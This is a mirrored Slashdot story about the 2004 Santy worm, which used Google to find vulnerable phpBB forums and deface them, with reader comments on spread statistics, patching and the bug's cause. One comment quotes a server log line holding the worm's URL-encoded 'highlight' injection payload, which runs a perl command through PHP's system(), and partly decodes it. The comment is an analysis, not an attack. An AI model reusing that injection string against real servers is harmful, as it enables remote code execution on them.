Slashdot Mirror

← Back to Stories (view on slashdot.org)

Net Worm Uses Google to Spread

Posted by michael on from the web-service-takes-on-new-meaning dept.

troop23 writes "A web worm that identifies potential victims by searching Google is spreading among online bulletin boards using a vulnerable version of the program phpBB, security professionals said on Tuesday. Almost 40,000 sites may have already been infected. In an odd twist if you use Microsoft's Search engine to scan for the phrase 'NeverEverNoSanity'-- part of the defacement text that the Santy worm uses to replace files on infected Web sites--returns nearly 39,000 hits." Reader pmf sent in a few more information links: F-Secure weblog and Bugtraq posting. Update: 12/22 03:34 GMT by T : ZephyrXero links to this news.com article that says Google is now squashing requests generated by the worm.

15 of 309 comments (clear)

  1. Quick! by Anonymous Coward · · Score: 5, Funny

    Someone figure out a way to blame this on Microsoft!

    1. Re:Quick! by AmberBlackCat · · Score: 5, Funny
      Someone figure out a way to blame this on Microsoft!

      The PHP guys will probably blame it on Apache 2.

  2. Under the Google radar by Meostro · · Score: 5, Interesting

    I saw this yesterday on a.... uhh... "anatomic reference" site:
    This site is defaced!!! NeverEverNoSanity WebWorm generation 10.

    I tried to find some kind of reference and Googled for it, but I got no results.

    Still nothing on it, wonder how long it'll be before it shows up?

    MSN search returns 3 results, that's just a bit short of 39,000, so I guess they must be using the beta engine for the article.

    1. Re:Under the Google radar by orangesquid · · Score: 5, Informative

      You can search for specific generations ( http://beta.search.msn.com/results.aspx?q=%22Never EverNoSanity+WebWorm+generation+4%22&FORM=QBRE ) to see the spread:
      0, 1, 2, 3 - no hits
      4 - 2335 hits
      5 - 9297 hits
      6 - 7218 hits
      7 - 7288 hits
      8 - 10746 hits
      9 - 12009 hits
      10 - 11752 hits
      11 - 14866 hits
      12 - 13267 hits
      13 - 8393 hits
      14 - 13317 hits
      15 - 3840 hits
      16 - 5004 hits
      17 - 1950 hits
      18 - 3344 hits
      19 - 6 hits
      20 - 1 hit
      21 - 3 hits
      22 - 1 hit
      23 - 1 hit
      24 - 1 hit
      25, 26, 27, 28, 29, 30 - no hits

      --
      --TheOrangeSquid Is it any wonder things seem so awry? We swim in a sea of confusion and don't have to think to survive
  3. Head line is way to misleading by mkop · · Score: 5, Informative

    There is nothing wrong with google. only with people who have not pathced the php buletin boards

    1. Re:Head line is way to misleading by taylortbb · · Score: 5, Informative

      Actually, it doesn't have to do with unpatched phpBB installations. It has to do with unpatched PHP installations.

      phpBB has an explanation of what the problem is, it can be found at:
      http://www.phpbb.com/phpBB/viewtopic.php?f=14&t=24 8046

      OTHER FORUMS ARE VULNERABLE

      (and no, I am not a phpBB zealot, I am pointing out a misconception)

  4. Poor /. by roman_mir · · Score: 5, Funny

    I think this virus/worm hit /., when I clicked on the link to this article, all I saw was: "Nothing for you to see here. Please move along."

    --
    You can't handle the truth.
  5. Latest Version of phpBB Unaffected by akiy · · Score: 5, Informative

    It looks like the latest phpBB version 2.0.11 or a simple patch will thwart the worm, though. Time to upgrade if you haven't yet!

    --

    --
    http://www.aikiweb.com - AikiWeb Aikido Information

    1. Re:Latest Version of phpBB Unaffected by Cutriss · · Score: 5, Informative

      Yes and no.

      It will protect your boards from being targeted by the Google component of the worm. However, if your boards are running on a shared server, and someone else has a vulnerable version of phpBB installed on their space, you could still be vulnerable. The worm is designed to poke around once it manages to lodge itself inside a host.

      Ordinarily, you could just blame those infected in this manner for not using proper permissions on their board installs, but with the amount of custom modifications many people have installed on their boards, it'd be no surprise if 90% of the people that think they're safe actually aren't. Make sure your files aren't writeable, folks.

      --
      "Mod, mod, mod...and another troll bites the dust."
  6. Infect Slashdot by somethinghollow · · Score: 5, Funny

    When it infects sites running SlashCode, it pretends to be a legitament post (so it can get the defacement tag "NeverEverNoSanity" on the front page, then monitors for posting, and tries to get first post, too.

  7. I got hit HARD! :( by Broadband · · Score: 5, Interesting

    This worm is unbelieveably evil.

    What it does is search all volumes on the server for files with the .asp .php .shtml .html .htm extentions and overwrites them with the 264 byte file that simply states "Web site defaced"

    I had a backup drive with everything mirrored that was unshared and secure and it managed to overwrite my ENTIRE backup as well on that machine.

    I've been spening the past 24 hours picking up the pieces and trying to get everything back online. 1/2 Done now.

    If you want to see what a defaced website looks like go to: http://www.sherwoodoregon.com and check it out before i get that site back online.

    -BB

  8. For all of you saying it's a PHP exploit by VeneficusAcerbus · · Score: 5, Informative
    From ISC:
    Note: we earlier reported that it takes advantage of a php vulnerability. This does not seem to be the case. The worm exploits the 'highlight' bug in phpBB 2.0.10 and earlier. The current version of phpBB (2.0.11, released Nov. 18th) fixes this problem. Nevertheless, its still a good idea to update php.
  9. Not PHP Bugs - phpBB exploit is used by a16 · · Score: 5, Informative

    As per the parent of this post, the post modded '+5 Informative' is false and includes the wrong announcement.

    This is not caused by the php bugs, it uses an issue in phpBB 2.0.10 and below. 2.0.11 fixes this, and has been available for ages (over a month).

    So in summary, if you use phpBB - upgrade to 2.0.11 now - not upgrading is not an option.

    I feel the above needs to be clarified, as there are already numerous people posting false information. Upgrading your PHP version won't protect against this (but you need to do it anyway to protect against other issues) - upgrading to phpBB 2.0.11 will. Simple :)

  10. This one's fun to debug - perl via url by falzbro · · Score: 5, Interesting
    I got this on a few servers yesterday- first thought it was related to the < PHP 4.3.10 bugs- it's not.

    This exploit is actually quite clever. It inputs values into the URL field that use the chr() function in PHP to pass text. It then writes its own perl script and executes it on the server.

    Here's the first line from the logfile:
    [20/Dec/2004:11:05:48 -0600] "GET /forum/viewtopic.php?p=738&sid=2db342b717c89bf9eca 3ef07e4910bf6&highlight=%2527%252Esystem(chr(112)% 252echr(101)%252echr(114)%252echr(108)%252echr(32) %252echr(45)%252echr(101)%252echr(32)%252echr(34)% 252echr(111)%252echr(112)%252echr(101)%252echr(110 )%252echr(32)%252echr(79)%252echr(85)%252echr(84)% 252echr(44)%252echr(113)%252echr(40)%252echr(62)%2 52echr(109)%252echr(49)%252echr(104)%252echr(111)% 252echr(50)%252echr(111)%252echr(102)%252echr(41)% 252echr(32)%252echr(97)%252echr(110)%252echr(100)% 252echr(32)%252echr(112)%252echr(114)%252echr(105) %252echr(110)%252echr(116)%252echr(32)%252echr(113 )%252echr(40)%252echr(72)%252echr(89)%252echr(118) %252echr(57)%252echr(112)%252echr(111)%252echr(52) %252echr(122)%252echr(51)%252echr(106)%252echr(106 )%252echr(72)%252echr(87)%252echr(97)%252echr(110) %252echr(78)%252echr(41)%252echr(34))%252e%2527 HTTP/1.0" 200 22613 "http://example.com/forum/viewtopic.php?p=738&sid= 2db342b717c89bf9eca3ef07e4910bf6&highlight=%2527%2 52Esystem(chr(112)%252echr(101)%252echr(114)%252ec hr(108)%252echr(32)%252echr(45)%252echr(101)%252ec hr(32)%252echr(34)%252echr(111)%252echr(112)%252ec hr(101)%252echr(110)%252echr(32)%252echr(79)%252ec hr(85)%252echr(84)%252echr(44)%252echr(113)%252ech r(40)%252echr(62)%252echr(109)%252echr(49)%252echr (104)%252echr(111)%252echr(50)%252echr(111)%252ech r(102)%252echr(41)%252echr(32)%252echr(97)%252echr (110)%252echr(100)%252echr(32)%252echr(112)%252ech r(114)%252echr(105)%252echr(110)%252echr(116)%252e chr(32)%252echr(113)%252echr(40)%252echr(72)%252ec hr(89)%252echr(118)%252echr(57)%252echr(112)%252ec hr(111)%252echr(52)%252echr(122)%252echr(51)%252ec hr(106)%252echr(106)%252echr(72)%252echr(87)%252ec hr(97)%252echr(110)%252echr(78)%252echr(41)%252ech r(34))%252e%2527" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

    If you decode the ascii characters, you get:

    perl -e "open OUT,q(>m1ho2of) and print q(HYv9po4z3jjHWanN)"

    I didn't have enough freetime to decode the whole thing due to.. actual work having to be done, but it's quite clever.

    --falz
  11. Re:Clarification by ScottMacVicar · · Score: 5, Informative

    I've been looking at the PHP related security hole and this does not have anything to do with the exploit the worm uses.

    The PHP exploit was to do with the length part of a serialized string, it wasn't correctly enforced and a suitably large enough value would crash a crash and print out contents of the stack which could include any variable within the script. s:1000:"test"; the 1000 part is not correctly checked.

    The phpBB exploit is regarding a remote code execution vulnerability, in this case it uses this vulnerability to fetch a perl script from a remote server and write it to the forum before executing it using the system command in PHP.

    So this worm only affects phpBB 2.0.10 and below.